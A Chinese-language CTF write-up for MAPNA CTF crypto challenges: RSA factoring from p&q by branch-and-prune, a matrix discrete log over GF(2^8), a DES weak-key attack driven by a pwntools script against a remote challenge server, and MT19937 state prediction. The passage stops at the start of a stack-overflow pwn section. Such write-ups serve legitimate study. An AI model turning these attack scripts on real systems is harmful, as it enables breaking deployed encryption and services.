继续打结束的比赛,不紧张,完成以后也可以慢慢修下代码.
Crypto
Isogenies
同源加密,没弄明白,并且没搜到WP
Shibs
RSA加密,先生成一个素数p,然后循环左移s位得到素数q给出p&q
from Crypto.Util.number import *
from flag import flag
def shift(s, B):
assert s < len(B)
return B[s:] + B[:s]
def gen_key(nbit):
while True:
p = getPrime(nbit)
B = bin(p)[2:]
for s in range(1, nbit):
q = int(shift(s, B), 2)
if isPrime(q):
n = p * q
return n, p, s #s可能很小
nbit = 1024
n, p, _ = gen_key(nbit)
q = n // p
dna = p & q
m = bytes_to_long(flag)
c = pow(m, 65537, n)
print(f'n = {n}')
print(f'dna = {dna}')
print(f'enc = {c}')
原先作过一道p&(q<<1)的题,以那个为模板作些修改
from Crypto.Util.number import *
n = 20316898932195904153277570911129808751568815578115203862825426326247688399447840960418077345063791379522152467572219078649052797300815169624324245983590614914067269781160218800744443132820786495383622657350005442865119235171347222481549171383138463856866590153226706585323109487068718209302113471433380661465050751463957327192775767168671487596946840993911799696944069759277414133632444513772210700794949276020219498655982617016744321984479076362225276288530893635176013522707993482886351558163399233902562390621254309853983712254751850630385079750216639722676398376824903099579116864460998259826947136455660974737633
dna = 112981924875557500958025001180130494828271302148393893025039250618449754880107262891213034570290994460680732065864408219699255537220809236513831561599199136870056419874815435027857448315805793914961273026882116413167515833581245087132919209478091324962372324771986076010340277554904109601589334046901209670673
enc = 3045339581292945711130813005351003100918522557110757541588006962379795819964889960982006172396478992403763951169397699477604011489683403206194674478676115307579754281253958928474112104087602753563505848223560038859380782692201785087834133116953880301903767021262497807797262966215767967235011554145888668721199447563741572273525508047234141844260401652933196055533764562153454963082569500478073362290691632890264262315099050876574517869170470080069161301450816555901477760392115210762498464643598219802952797283932722013302922244300834587051779128033516492433437534261890143822056118794447406885925957834712258842422
nbit = 1024
#test
'''
nbit = 128
n = 54806273471734426848076644605552636373334768906819576755734949055415399448617
p = 189996131273799767657828044014097273591
q = 288459944443574806693489336664825208287
dna = 180792125784322614120793611349623836887
sbit = 17
'''
maps = [int(i,2) for i in bin(dna)[2:]]
def check(v0,v1):
for i in range(nbit):
if v0[i]!='*' and v1[i]!='*' and int(v0[i])&int(v1[i]) != maps[i]:
return False
else:
return True
def add_check(v0,v1,ii,tp):
lv0,lv1=list(v0),list(v1)
for i in range(nbit):
i2 = (i-sbit)%nbit
j2 = (i+sbit)%nbit
if lv0[i] != lv1[i2]:
if lv0[i] == '*': #*0 *1
lv0[i] = lv1[i2]
elif lv1[i2] == '*': #0* 1*
lv1[i2] = lv0[i]
else: #10 01
#print(f"{v0}\n{v1}\n{ii} 0 {i} {i2}\n")
return []
if lv1[i] != lv0[j2]:
if lv1[i] == '*':
lv1[i] = lv0[j2]
elif lv0[j2] == '*':
lv0[j2] = lv1[i]
else:
#print(f"{v0}\n{v1}\n{ii} 1 {i}\n")
return []
tmp = []
if tp==0: #上边
lv0[ii] = '0'
if check(lv0,lv1):
tmp.append(''.join(lv0)+''.join(lv1))
lv0[ii] = '1'
if check(lv0,lv1):
tmp.append(''.join(lv0)+''.join(lv1))
else:
lv1[ii] = '0'
if check(lv0,lv1):
tmp.append(''.join(lv0)+''.join(lv1))
lv1[ii] = '1'
if check(lv0,lv1):
tmp.append(''.join(lv0)+''.join(lv1))
#print(tmp)
return tmp
def get_v(sp,sq):
queue = [''.join(sp)+''.join(sq)]
while True:
#print(len(queue))
tmp = []
if len(queue)==0:
break
for v in queue:
#修剪
v0,v1 = v[:nbit],v[nbit:]
#print(''.join(v0)+'\n'+''.join(v1))
#print(len(v))
sv10,sv20 = int(v0.replace('*','0'),2),int(v1.replace('*','0'),2)
sv11,sv21 = int(v0.replace('*','1'),2),int(v1.replace('*','1'),2)
if sv10*sv20 == n:
print(f"p = {sv10}\nq = {sv20}")
return
elif sv11*sv21 == n:
print(f"p = {sv11}\nq = {sv21}")
return
elif sv10*sv20>n:
#print('exit 1', hex(sv10),hex(sv20), sv10*sv20)
continue
elif sv11*sv21<n:
#print('exit 2', hex(sv11),hex(sv21), sv11*sv21)
continue
#print('In')
tp = 2
for i in range(nbit):
if v0[i] == '*':
tp = 0
break
if v1[i] == '*':
tp = 1
break
else:
if int(v0,2)*int(v1,2) == n:
print('p = ', int(v0,2))
print('q = ', int(v1,2))
tmp = []
return
continue #queue next
#print("pos:",i)
# i
# s . | ... ..
# ... | s .
# j
tmp += add_check(v0,v1,i,tp)
queue = tmp
for sbit in range(1,nbit//2):
#print(sbit)
sp = [i if i=='1' else '*' for i in bin(dna)[2:]]
sq = sp[sbit:] + sp[:sbit]
for i in range(nbit):
if sp[i] == '1' and sq[i] == '*':
if maps[i] == 1:
sq[i] = '1'
else:
sq[i] = '0'
if sp[i] == '*' and sq[i] == '1':
if maps[i] == 1:
sp[i] = '1'
else:
sp[i] = '0'
#print(''.join(sp)+'\n'+''.join(sq))
get_v(sp,sq)
p = 118627270647424424141514783307481285886258073029116821903046590278901771054287488093459396876753105609837026655906589077937738668295841155401318912730133481985678923364535216697903225159999957216575823849034786092435988869550296395479754426578068176634670446795305597283053006032071267819138579464710410086097
q = 171266681103878322117424575175361468379674209043813157946561665043786388947203228350875263109216690282197981858022233522587435146007011089350418152369819924630928608372164838867715907687708478655112024432448453837808032774893387899232268630799449237496392996637407630619155994281854191089804529710230573475089
long_to_bytes(pow(enc, inverse(65537,(p-1)*(q-1)), n))
#b'MAPNA{Br4nch_&_prun3_Or_4Nother_ApprOacH???}'
GLNQ
基于矩阵的DLP问题,但是以伽瓦罗域的形式给出的矩阵
from Crypto.Util.number import *
from flag import flag
F, k = GF(2**8), 14
while True:
G = random_matrix(F, k)
if G.is_invertible():
break
flag = flag.lstrip(b'MAPNA{').rstrip(b'}')
m = bytes_to_long(flag) #m = int(flag) 给的有问题
H = G ** m
print(f'G = {G}')
print(f'H = {H}')
G =[[ x^7 + x^6 + x^4 + x^3 + x^2, x^7 + x^6 + x^2, x^5 + x^4 + x^3, x^3 + x, x^6 + x^5 + x^3 + x^2, x^5 + x^4 + x^3 + x^2 + x, x^7 + x^6 + x^5 + x^3 + x + 1, x^4 + x^3, x^7 + x^5 + x^4, x^7 + x^2 + x, x^5 + x^4 + x^2 + x, x^7 + x^6 + x^4 + x^3 + x + 1, x^7 + x^5 + x^3 + x, x^6 + x^4 + x^3 + x^2 + 1],
[ x^7 + x^5 + x^4, x^7 + x^3 + x, x^7 + x^4 + x^3 + x^2 + x + 1, x^5 + x^4 + x^3, x^6 + x^4 + x^3 + x^2 + x, x^4 + 1, x^5 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + 1, x^7 + x^6 + x + 1, x^7 + x^6 + x^5 + x^2 + 1, x^4 + x^3 + x^2 + x, x^6 + x^2, x^7 + x^6, x^7 + x^5 + x^4],
[ x^7 + x^4 + 1, x^5 + x^4 + x^3 + x^2 + x, x^6 + x + 1, x^6 + x^3 + x^2 + 1, x^6 + x^4 + x^3 + x^2 + 1, x, x^5 + x^3 + x^2 + x + 1, x^6 + x^5 + x^3 + x^2 + x, x^7 + x^5 + x^4 + x^3, x^5 + x^2, x^2 + x + 1, x^7 + x^6 + x^4, x^7 + x^5 + x^4 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1],
[ x^7 + x^5 + x^4 + x^3 + x^2 + x, x^7 + x^6 + x^4 + x^2 + x, x^5 + x^3 + x^2 + 1, x^7 + x^5 + x^3 + x, x^6 + x^4 + x^3 + x + 1, x^7 + x^6 + x^2 + 1, x^7 + x^2, x^4 + x^3 + 1, x^7 + x^6 + x^3 + x^2 + x + 1, x^7 + x^4 + x^3 + x^2 + x + 1, x^7 + x^5 + x^4 + x^2 + 1, x^6 + x^4 + x^2 + x, x^7 + x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^3 + x^2 + x + 1],
[ x^7 + x^5 + x^4 + x^2 + x, x^5 + x^4 + x^3 + x^2 + x, x^5 + x^3, x^5 + x^4 + x^3 + x + 1, x^6 + x^5 + x^3, x^7 + x^6 + x^5 + x^2, x^7 + x^6 + x^2 + 1, x^5 + x + 1, x^4 + x^3 + 1, x^6 + x^5, x^5 + x^3 + x^2 + x + 1, x^7 + x^6 + x^4 + x^3 + x, x^7 + x^2, x^7 + x^6 + x^5 + x^3 + x],
[ x^7 + x^5 + x^3 + x^2 + x + 1, x^7 + x^6 + x^4 + x^3, x^7 + x^4, x^7 + x^6 + x^5 + x^3 + 1, x^5 + 1, x^7 + x^4 + x^3 + x^2 + 1, x^5 + x^4 + x^3 + x^2, x^7 + x^6 + x + 1, x^2 + x + 1, x^7 + x^2, x^5, x^5 + x^4 + x^2 + x, x^7 + x^5 + x^3 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1],
[ x^6 + x^4 + x^3 + 1, x^6 + 1, x^6 + x^4 + x^3 + x + 1, x^5 + x^4 + x^3 + x, x^5 + x^4 + 1, x^7 + x^4 + x + 1, x^7 + x^6 + x + 1, x^6 + x^3 + x^2 + 1, x^5 + x^2 + 1, x^5 + x^3 + x^2 + 1, 0, x^6 + x^4 + x^3 + x^2 + x, x^6 + x^4 + x^3 + x^2, x^4 + x^2 + 1],
[ x^7 + x^6 + x^4 + x^3, x^6 + x^3 + x^2 + x, x^7 + x^5 + x^2 + 1, x^7 + x^6 + x^2 + 1, x^7 + x^6 + x, x^6 + x^3 + 1, x^7 + x^6 + x^3 + x^2 + x, x^7 + x^5 + x^2 + x + 1, x^6 + x^4 + x^3 + x + 1, x^7 + x^4 + x^3 + x^2 + x + 1, x^5, x^7 + x^6 + x^4 + 1, x^6 + x^5 + x^4, x^7 + x^5 + x^4 + 1],
[ x^7 + x^5 + x^2 + 1, x^6 + x^5 + x^2 + 1, x^7 + x^6 + x^4 + x^2 + x + 1, x^6 + x^5 + 1, x^6 + x^4 + 1, 0, x^7 + x^6 + x^5 + x^4 + x^3, x^5 + x^4 + x^2 + 1, x^7 + x^6 + x^5 + x^3, x^5 + x^4 + x + 1, x^7 + x^6 + x^4 + x^2 + x + 1, x^6 + x^2, x^7 + x^6 + x^3, x^4 + x^3 + 1],
[ x^7 + x^6 + x^3, x^7 + 1, x^6 + x^5 + x^4 + x^2, x^5 + x^4 + x^2 + 1, x^7 + x^6 + x^4 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1, x^6 + x^3, x^7 + x^3 + x^2 + 1, x, x^5 + x^4 + x^2 + x + 1, x^6 + x^5 + x^3 + x + 1, x^7 + x^6 + x^3 + x^2, x^5 + x^3 + x^2, x^5 + x^4 + x + 1],
[ 0, x^6 + x^5 + x^4 + x^3 + x, x^7 + x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^4 + x^2, x^5 + x^3 + x + 1, x^7 + x^5 + x^4 + x + 1, x^7 + x^5 + x^4, x^6 + x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^2 + 1, x^5 + x^4 + x^3, x^7 + x^6 + x^5 + x^3 + x^2 + x + 1, x^7 + x^6 + x^4 + x^3 + x^2 + x, x^7 + x^4 + 1, x^6 + x^5 + x^4 + x^2 + 1],
[ x^3 + x, x^3 + 1, x^4 + x^3 + x + 1, x^5 + x^3 + 1, x^7 + x^6 + x^5 + x^2, x^7 + x^6 + x^4 + x^2 + x, x^6 + x^5 + x^4 + x, x^6 + 1, x^7 + x^6 + x^3 + x^2 + x, x^7 + x^3 + x^2, x^4, x^6 + x^5 + x^4 + x^3 + x, x^6 + x^5 + x^2, x^5 + x^3 + x^2 + x + 1],
[ x^7 + x^6 + x^5 + x^3 + x^2 + 1, x^7 + x^3 + x, x^5, x^6 + x^5 + x^2 + x, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^4 + x, x^7 + x^5 + x^4 + x + 1, x^6 + x^4 + x + 1, x^7 + x^6 + x^5 + x^4 + x^2 + 1, x^7 + x^6 + x^5 + x, x^7 + x^5 + x^3 + x^2 + x, x^7 + x^6 + x^5 + x^2 + x + 1, x^6 + x^5 + x^4 + x^3 + x + 1],
[ x^6 + x^4 + 1, x^6 + x^3 + x^2, x^6 + x^5 + x^3 + x, x^7 + x^6 + x^5 + x^3 + x^2, x^6 + x^5 + x^2, x^6 + x^5 + x^3 + x^2 + 1, x^6 + x^3 + x^2 + x, x^7 + x^3 + x + 1, x^7 + x^4 + x^3 + x^2 + x + 1, x^3 + x + 1, x^6 + x^4 + x^2, x^7 + x^4, x^6 + x^5 + x^4 + x^2 + x, x^6 + x^5 + x^3 + x^2 + 1]]
H =[[ x^7 + x^3 + x^2 + 1 , x^4 + x^3 + 1 , x^6 + x^4 + x^3 + x, x^6 + x^5 + x^4 + x^2 + 1, x^7 + x^5 + x^4 + x^3 + x^2 + x, x^6, x^4 + x^3 + 1, x^6 + x^5 + x^4 + x^3, x^6 + x^5 + x^3, x^7 + x^5 + x + 1, x^6 + x^4 + x^3 + x, x^7 + x^6 + x^4 + x^3 + x, x^6 + x^4 + x^2 + x, x^7 + x^6 + x^3 + x^2 + x + 1],
[ x^6 + x^2 + x , x^6 + x^5 + x^3 + x , x^6 + x^5 + x^4 + x^2, x^7 + x^5 + x + 1, x^7 + x^6 + x^5 + x^4 + x + 1, x^6 + x^5 + x^2 + x + 1, x^7 + x + 1, x^2 + 1, x^5 + x^2, x^7 + x^6 + x^5 + x^4 + x^3 + x^2, x^5 + x^2 + x + 1, x^5 + x^2 + x + 1, x^6 + x^5 + x^4 + x^2 + 1, x^7 + x^2 + x + 1],
[ x^6 + x^5 + x^4 + x^3 + x , x^6 + x^4 + x + 1 , x^7 + x^6, x^7 + x^6 + x^4 + x^3 + x^2 + 1, x^5 + x^2 + x + 1, x^7 + x^6 + x^4 + x^3 + 1, x^7 + x^6 + x^4 + x^2, x^5 + x^4 + x^3 + x^2, x + 1, x^6 + x^4 + x^3 + x^2 + 1, x^2 + 1, x^7 + x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6, x^7 + x^3 + 1],
[ x^7 + x^4 + x^3 + x^2 , x^7 + x^6 + x^5 + x^4 + x^2 + 1 , x^7 + x^5 + x^2 + x + 1, x^3 + x^2, x^4 + x^3 + x^2, x^5 + x^4 + x^3 + x^2 + x, x^7 + x^4 + x + 1, x^7 + x^4 + x^3 + x^2 + 1, x^4 + x, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1, x^6 + x^5 + x^2, x^7 + x^6 + x^3 + x + 1, x^6 + x^4 + x^3 + x + 1, x^7 + x^3 + x],
[ x^7 + x^6 + x^5 + x^4 + 1 , x^5 + x^3 + x^2 + 1 , x^4 + x, x^6 + x^5 + x^4 + 1, x^6, x^7 + x^5 + x^2 + 1, x^7 + x^6 + x^2 + x + 1, x^7 + x^5 + x^3 + x^2 + x, x^7 + x^3 + x + 1, x^7 + x^5 + x^3 + 1, x^7 + x^4 + 1, x^7 + x^4 + x^3 + x, x^6 + x^5 + x^4 + 1, x^6 + x^5 + x^4 + x^3],
[ x^7 + x^4 + x^2 + 1 , x^5 + x^3 , x^7 + x^6 + x^4 + x^3 + x^2, x^7 + x^4 + x, x^7 + x^6 + x^4 + x^3 + x^2, x^5 + x^4 + x^3 + 1, x^3 + x^2 + x + 1, x^6 + x^5 + x^4 + x^2 + x + 1, x^6 + 1, x^3 + x^2, x^7 + x^5 + x^4 + x^2 + 1, x^7 + x^5 + x^4 + x^3 + x + 1, x^5 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^3 + x^2 + x + 1],
[ x^7 + x^6 + x^5 , x^6 + x^5 + x^3 , x^6 + x^5 + x^3 + x, x^5 + x^4, x^7 + x^5 + x^4 + x, x^2, x^6, x^6 + 1, x^7 + x^5 + x^4 + x^3, x^7 + x^2, x^7 + x^3 + x^2 + x + 1, x^7 + x^6 + x^4 + x^3 + x^2 + 1, x^7 + x^6 + x^2 + x + 1, x^7 + x^6 + x^3 + x^2 + x + 1],
[ x^7 + x^5 + x^3 + 1 , x^6 + x^3 + x^2 + x + 1 , x^6 + x^5 + x^3 + x^2 + 1, x^3 + x^2 + x + 1, x^7 + x^3 + x^2, x^2, x^6 + x^5 + x^4 + x + 1, x^3 + x^2 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x + 1, x^6 + x^3, x^7 + x^5 + x^4 + 1, x^4 + x + 1, x^5 + x^4 + 1, x^5 + x^4 + x^3 + x^2 + 1],
[ x^7 + x^6 + x^4 + x^2 + x + 1 , x^6 + x^3 + x , x^6 + x^5 + x^3 + x^2 + x, x^4 + x^2 + 1, x^6 + x^2, x^6 + x^3 + x, x^6 + x^4 + x^3 + x, x^5 + x^4 + x^3 + x^2 + x, x^7 + x^6 + x^2, x^2 + 1, x^6 + x^5 + x^4, x^7 + x^6 + x^3 + 1, x^7 + x^6 + x^5 + x^2 + x, x^7 + x^6 + x^3 + 1],
[ x^7 + x^6 + x^3 + x^2 , x^7 + x^5 + x^3 + 1 , x^7 + x^6 + x^3 + 1, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1, x^4 + x^3 + x^2 + 1, x^7 + x^3, x^6 + x^4 + x^3 + x^2 + 1, x^2 + x + 1, x^7 + x^6 + x^3 + x^2, x^6 + x^5 + x^3 + x, x^4 + x^3 + x^2, x^7 + x^6 + x^5 + x^4 + x^2 + x + 1, x^6 + x^2 + x + 1, x^6 + x^5 + x^4 + x^3 + x + 1],
[ x^7 + x^6 + x^5 , x^6 + x^5 + x^4 + x^3 + x^2 + 1 , x^7 + x^5 + x^2 + 1, x^3, x^7 + x^6 + x^5 + x^4 + x^2 + x + 1, x^7 + x^4 + x^3 + x^2 + 1, x^7 + x^4 + 1, x^7 + x^5 + x^4 + x^2, x^4 + x^3 + x^2 + 1, x^6 + x^5 + x^4 + x^3 + x^2 + x, x^6 + x^4 + x^3 + x^2 + x, x^7 + x^6 + x^2 + x + 1, x^6 + x^4 + x^3 + x^2 + 1, x^5 + x^4 + x^2 + x],
[ x^3 + 1 , x^7 + x^3 + x^2 + 1 , x^7 + x^6 + x^2 + x + 1, x^6 + x + 1, x^7 + x^5 + x^4 + x^3 + x^2, x^7 + x^6 + x^5 + x^2, x^7 + x^3 + x, x^7 + x^6 + x^4 + x^3 + x^2 + x + 1, x^4 + x^3 + x, x^7 + 1, x^7 + x^5 + x^2 + x + 1, x^6 + x^2, x^4 + 1, x^7 + x^6 + x^5 + x^4 + x^3 + x],
[x^7 + x^6 + x^5 + x^3 + x^2 + x + 1 , x^7 + x^5 + x^4 + x^2 + x , x^7 + x^4, x^5 + x^3 + x^2 + x + 1, x^6 + x^4, x^6 + x^2, x^7 + x^6 + x^2 + 1, x^7 + x^6 + x^2 + x, x^5 + x^4 + x^2 + x + 1, x^6 + x^3, x^7 + x^4 + x^3 + x^2 + x + 1, x^7 + x^6 + x^5 + x^3 + x + 1, 0, x^7 + x^3 + 1],
[ x^6 + x^5 + x^2 + x , x^3 + x^2 + 1 , x^5 + x^4 + x^2 + x, x^6 + x^4 + x^2 + x, x^7 + x^6 + x^5 + x^4 + x^3 + 1, x^7 + x^6 + x^4 + x^2 + x + 1, x^7 + x^6 + x^2 + 1, x^6 + x^2 + x + 1, x^7 + x^6 + x^5 + x^4 + x^3 + 1, x^7 + x^6 + x^2 + x, x^7 + x^5 + x^4 + 1, x^6, x^4 + x^3 + 1, x^6 + x^3 + x]]
经问师傅,得到两种生成矩阵的方法
#方法1
R = GF(2^8)
G = matrix(GF(2^8),14)
G[i,j] = R('z8^3 + 1')
#方法2
R = GF(2^8)
z8 = R.gen()
G = matrix([[z8^3+1,...],...])
然后还得到解法,在sagemath 10.0,discrete_log函数可以一个带算法参数的algorithm='lambda'
可以直接使用网上在线求 Sage Cell Server
if G.is_invertible():
m = discrete_log(H, G,algorithm='lambda')
assert H==G**m, 'not-yet'
print(m)
else:
print('no')
#6424379811053277573417442136
#MAPNA{6424379811053277573417442136}
不过题目的bytes_to_long似乎是int,根据网上的WP确实不需要long_to_bytes回去.
Be Fast🏃
远程用DES进行加密,密钥由用户输入,一共14个,最后一个加上循环左移一位重复7次加上后7个密钥一共生成21个密码,再用这些密码对数据进行加密,要求在短时间内根据密文求出明文.
#!/usr/bin/env python3
from random import *
from binascii import *
from Crypto.Cipher import DES
from signal import *
import sys, os
from flag import flag
def die(*args):
pr(*args)
quit()
def pr(*args):
s = " ".join(map(str, args))
sys.stdout.write(s + "\n")
sys.stdout.flush()
def sc():
return sys.stdin.buffer.readline()
def shift(msg, l):
assert l < len(msg)
return msg[l:] + msg[:l]
def pad(text):
if len(text) % 8 != 0:
text += (b'\xff' * (8 - len(text) % 8))
return text
def encrypt(msg, key):
msg = pad(msg)
assert len(msg) % 8 == 0
assert len(key) == 8
des = DES.new(key, DES.MODE_ECB)
enc = des.encrypt(msg)
return enc
def main():
border = "+"
pr(border*72)
pr(border, ".:: Hi all, you should be fast, I mean super fact!! ::.", border)
pr(border, "You should send twenty 8-byte keys to encrypt the secret message and", border)
pr(border, "just decrypt the ciphertext to get the flag, Are you ready to start?", border)
pr(border*72)
secret_msg = b'TOP_SECRET:' + os.urandom(40)
cnt, STEP, KEYS = 0, 14, []
md = 1
while True:
pr(border, "please send your key as hex: ")
alarm(md + 1)
ans = sc().decode().strip()
alarm(0)
try:
key = unhexlify(ans)
if len(key) == 8 and key not in KEYS:
KEYS += [key]
cnt += 1
else:
die(border, 'Kidding me!? Bye!!')
except:
die(border, 'Your key is not valid! Bye!!')
if len(KEYS) == STEP:
print(KEYS)
HKEY = KEYS[:7]
shuffle(HKEY)
NKEY = KEYS[-7:]
shuffle(NKEY)
for h in HKEY: NKEY = [key, shift(key, 1)] + NKEY #[A,shift_A]*7 + [xxx]
enc = encrypt(secret_msg, NKEY[0])
for key in NKEY[1:]:
enc = encrypt(enc, key)
pr(border, f'enc = {hexlify(enc)}')
pr(border, f'Can you guess the secret message? ')
alarm(md + 1)
msg = sc().strip()
alarm(0)
if msg == hexlify(secret_msg):
die(border, f'Congrats, you deserve the flag: {flag}')
else:
die(border, f'Sorry, your input is incorrect! Bye!!')
if __name__ == '__main__':
main()
由于循环左移一字节当输入相同的8字符时与原密钥相同,并且DES是8字节块加密,所以可以用已知固定的头和密钥的全排列生成字典,通过密文查字典得到正确的密钥顺序现解密.
import itertools
from Crypto.Cipher import DES
def encrypt(enc,keys):
for v in keys:
des = DES.new((v*8).encode(), DES.MODE_ECB)
enc = des.encrypt(enc)
return enc
def decrypt(enc,keys):
for v in keys:
des = DES.new((v*8).encode(), DES.MODE_ECB)
enc = des.decrypt(enc)
return enc
enc0 = b'TOP_SECR'
dic = {}
key = '1234567'
for v in itertools.permutations(key):
t1 = '7'*14+''.join(v)
v2 = encrypt(enc0,t1)
dic[v2.hex()] = t1
#print(v2.hex(),t1)
print('-'*20)
print('Total:', len(dic))
#-----------------------
#输入的key
from pwn import *
p = remote('3.75.180.117', 37773)
context.log_level = 'debug'
v = 'abcdefg1234567'
for i in v:
p.sendlineafter(b'+ please send your key as hex: \n', (i*8).encode().hex().encode())
p.recvuntil(b"+ enc = b'")
enc = p.recvline().strip()[:-1].decode()
key = dic[enc[:16]]
print(enc[:16], key, enc)
msg = decrypt(bytes.fromhex(enc), key[::-1])
print(msg)
p.sendlineafter(b'+ Can you guess the secret message? \n', msg[:-5].hex().encode())
p.recvline()
p.recvline()
p.interactive()
#enc = '379cfa337a483e0a9073efdb0b424b501a29f9cdaf3c2e709303a006f61665bf27aa29d282614aa19c3485389eb9ea5172962bb7a9e2ad37'
#MAPNA{DES_h4s_A_f3W_5pec1f!c_kEys_7eRm3d_we4K_k3Ys_And_Sem1-wE4k_KeY5!}
What next?
这题是个热身题,本意是一个梅森旋转求随机数,但是一不小心给了结果,直接异或即可,正式题是下一个.
What next II?
给了79个256位随机数,可以恢复state,然后求下几个再异或求明文.
这比赛很怪,第1题巨难几乎无人能解,然后越来越简单
#!/usr/bin/env python3
from random import *
from Crypto.Util.number import *
from flag import flag
def encrypt(msg, KEY):
m = bytes_to_long(msg)
c = KEY ^ m
return c
n = 80
TMP = [getrandbits(256) * _ ** 2 for _ in range(n)]
KEY = sum([getrandbits(256 >> _) ** 2 for _ in range(8)])
enc = encrypt(flag, KEY)
print(f'TMP = {TMP}')
print(f'enc = {enc}')
用那个库直接求
TMP = [0, 22330693840234311255135949029444484409546667648719176405826663892267656641027, 127168478027482847709328807841325386271927515479937061237117195618823278578116, 182258311374053859620888699680212168010665323374548870180038645090147843867373, 1120044041165490856498692287111236626472260308631093314161690677868431277653536, 1983473421395194676263973602935227753154638099492341714205203280778040675593450, 1574768551732085861078069762534699936995654652684634077104498873387111232412816, 4988773041677976257517254491234335651753610239922582254283447205154548743632904, 869738033317159039287197189670964123964466628318970710545560734535418094431872, 716771557072892076589368879721160406613516964478389692662921907034616035095047, 2841054733362182186252458286741823726277405165099408732758691872324732479956600, 6200268989316199565071790593244237980113705529543497656127585449937778556282311, 10670728743047162087774896911955052588177734200772863764402582886370432879158720, 7713906922622752752151916696524419287963819641354815269293605765422900017233866, 13689077681405838115291939958594572280593102467042881661528817316126253635857444, 23677404931618939684375357302211056316481456538100460743428412550112769975941300, 22334702277647520331031971258896634990832479997228972554803329027443498276011264, 24695994670269108821474844143270568317378271123560130717104045624895774803117988, 10726839246587772223823222881528936091917884797218227418638385365176143122217812, 1312747277711228023681888222399668996816715931126782050057534166588569071642948, 14829434912751138825019062212374862054511849430113519894438429231649766515851600, 4917180643387964007287001238070594020985844865025196727991425387470641537875518, 50772176246766546694026388399540445347088279634906123947563600159509306535585300, 20680598744337311676861190641592800456437920078216405214477640693225317242487078, 57560623230262776939750106414721715686651269149245752162663251361023294801081600, 63941301709699592129851769466238327968731332723117779339939586823464299930335000, 30248094445348087425063737332624900285689080519537666953907462011122884602991780, 9774708715683840095021685805936771586028623975773332766526807054152590972465402, 61228751294246951869891671407294469506401133460669313068369993608651062307301536, 41981261972157910420555352577742115252749734931422260886610665615142932761250238, 92332289648534120255700799585162857690611895814212622902006472593032842219422300, 102090694836612045964656351247645673041342905792690679450732518780700786595757872, 8465306744686231379969736050689382339949995071265316552433666241539252681451520, 114072153081233359084524715014825650254537286682603109151986752844288607088786066, 39946361462751138749261511325777846481011288953117931061771127396007551287911208, 51243479474799144289518571031495536096625532453885999576052634625243425716758700, 132356504405092579871543186323238530972479261975470487510352508943760068475015440, 109077835346013498228568867183016137777644328620298812835459712256002833220195417, 52635267919343130972014005273289555808336337947193348140410148289978267235415648, 9568343438735227407132147420705807168258684366618511035784505242511446472528193, 136103745592722122037143341370556407561964415802887285393102934361453911394982400, 15501324115571167305412632833471884183641743683875758176471163573103721210677697, 124579054262159655532164017523017564697199759561416452868759873217906475930663652, 69331433672201876294056448428159828327113921951663941374636039203754564050923557, 134825790087045765574290263555594553874136924161813224135475519279020442040026864, 127098236196925756090074171499128508507461799729629969599917408442298996799214250, 120716315173788627251671396349879537684221828425501013413665864262612928100844788, 246230945837378885729579613348413794121875158206606559652651668292953179058653508, 182436930868427241575608788617950343128628563937798409868187047670441481734494464, 2216307326510769061988701188806623458793041637834505792592287312459658319545700, 217778196427604121810125555838576095983026719310491477185297193068203986197977500, 200042153662024093707446037685450040433674498805614787040971237961725493946807124, 55096521527758008435839474651130444687406648424301616531387151625485823586357376, 315911207494925949742212443025101639383551363855632617410391325922132118052280432, 160608721274889447938606989650810386105243008009388938737103600719751998405695052, 80485718020426913778898398898436382386718914865993732581279132006386834763843750, 175256027423949464821148437330609889703365513530429385704635213979205690543187968, 312494592697141143680238564093947039458907138790072672218576868913190841311490441, 12551558878313236197845748627693664902436846005140074555532691630477757920400492, 368163678666609325358026149200535116090648801749210267074911311082497122727619418, 132244486142872991925346591101049195464960273281071718729683433268064480383763200, 187524820546739515326467479985404725103464284941528452333038247179114024353648176, 283320427018968981710753682470612392210145925235229015984823155988278867852342424, 273076274412276025537791810337835157311632197268182698230310819989050497776963263, 327014096802403962955714851262399814244813548393488285833127238998882721132883968, 206832690482752439833856322955815020186765387390104398292271480795930880106073325, 104167288428075991079921385804154376915444422785935287020330329091692992364020356, 468442878028756757484855000070722747267796721762231179211069666438706434848755245, 13006681553773847728990900149289800641720551387610802780788594468812438984199760, 199716185379958028413200192962692404940513822154864483463050473557869065589649168, 412558417168152436059170177108518481504104909389966119467224740980715361039084900, 379013360598848524426838307544021120793535763669172279637583374247930017257612752, 79510803625960975136293110699095743477640774841480691165531320726532279504009152, 119246467719878286004186703543298639812649580965124121805161153548472942538790653, 44235048729597559877492812430806736314711896199059487848598597142896457753232432, 453319033816285234767354843915966019736243075972507643199351036007057824008570000, 300975897791737470999557383409844137620736489995632513055593286593028252152372832, 488688724028459389993054497130088474659149461722402520817247390457263798063265080, 98311703485802819685121101139900586756957739352203591545958914778011243453808576, 503894794312461918204750180188338003935699664049776370432270755067603639622480931]
enc = 1954128229670403595826293823451515985816812578139791173172421160740653397416251058891670696398940725266238000104900728729829302299509397650740333416176077
from extend_mt19937_predictor import ExtendMT19937Predictor
predictor = ExtendMT19937Predictor()
#导入已知的624个数据,导入后指向尾部
for i in range(1,80):
predictor.setrandbits(TMP[i]//i**2, 256)
KEY = sum([predictor.predict_getrandbits(256 >> _) ** 2 for _ in range(8)])
msg = enc^KEY
long_to_bytes(msg)
#b'MAPNA{4Re_y0U_MT19937_PRNG_pr3d!cT0r_R3ven9E_4057950503c1e3992}'
PWN
ninipwn
感觉pwn很难,热身都不好热
栈溢出
int __cdecl main(int argc, const char **argv, const char **envp)
{
disable_io_buffering();
puts("XOR encryption service");
encryption_service();
return 0;
}
unsigned __int64 encryption_service()
{
